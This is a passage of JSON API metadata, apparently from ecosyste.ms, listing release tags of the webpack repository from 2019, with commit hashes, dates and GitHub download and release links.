cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717c